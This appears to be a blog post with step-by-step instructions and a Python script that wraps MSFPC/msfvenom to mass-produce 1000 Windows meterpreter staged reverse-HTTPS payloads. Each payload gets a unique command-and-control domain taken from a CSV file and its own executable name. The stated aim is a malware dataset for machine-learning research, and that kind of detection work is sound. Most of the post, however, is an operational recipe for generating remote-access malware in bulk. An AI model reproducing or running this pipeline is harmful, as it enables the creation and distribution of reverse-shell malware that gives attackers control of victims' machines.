Objective: Generation of 1000 Metasploit payloads each with a unique C&C domain name and binary name.
Purpose: Creation of malware dataset for Machine Learning
Background: Previously i used MSVenom Payload Creator (MSFPC) for quickly generating payloads. MSFPC is a wrapper class on top of MSFVenom. MSFPC is insufficient to meet my objective, thus i had to write a wrapper class on top of MSFPC.
*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant.
Overview:
1) On a Kali Linux VM
2) Update Metasploit
apt update apt install metasploit-framework
3) Install MSFPC
apt install -y msfpc
4) Open gedit and copy the below python script
import pandas as pd import numpy as np import matplotlib.pyplot as plt import socket from socket import error as socket_error import errno import subprocess from subprocess import Popen #read domain names to use print ("Reading domain names from csv file:") df = pd.read_csv('./website.csv') df.info() df.describe() print ("Loaded domain name file") print("") correctmsg = "Done" errmsg = "bignum too big to convert" startfrom = 2 for index, row in df.iterrows(): if startfrom > index: print ("skip: "+str(row[1])) continue attempt = 1 #uncomment the 2 lines below to use the resolved ip address instead try: addr = socket.gethostbyname(row[0]) print(addr) except socket_error as serr: if serr.errno == -2: print ("Domain: "+row[0]+" is unresolvable, using default IP value instead.") row[0] = "127.0.0.1" command = "windows " + row[0] + " https" binaryname = str(row[1])+".exe" print (command) #set i to any positive number to start the loop i = 9999 x = -1 while x == -1: proc = subprocess.Popen(['msfpc', command], stdout=subprocess.PIPE,stderr=subprocess.PIPE) tmp = proc.communicate()[0] x = tmp.find(correctmsg) #-1 represent errmsg is not found thus implying that crafting is successful i = tmp.find(errmsg) #print ("i value:" + str(i)) if i != -1 : print ("retrying error crafting payload...: attempting " + str(attempt) + " times") attempt = attempt + 1 if x == -1 : print ("error: " + tmp) attempt = attempt + 1 print ("Command: msfpc " + command + " is successful.") print ("Saving as :" + binaryname) subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True) print ("Saved") print ("")
5) Create a csv file using excel with the following format and save it as website.csv:
6) Execute the Python script (*internet is needed as msfvenom will validate the LHOST domain name)
7) About 40mins for 100 binaries, 900 to go =)
Posts
No comments:
Post a Comment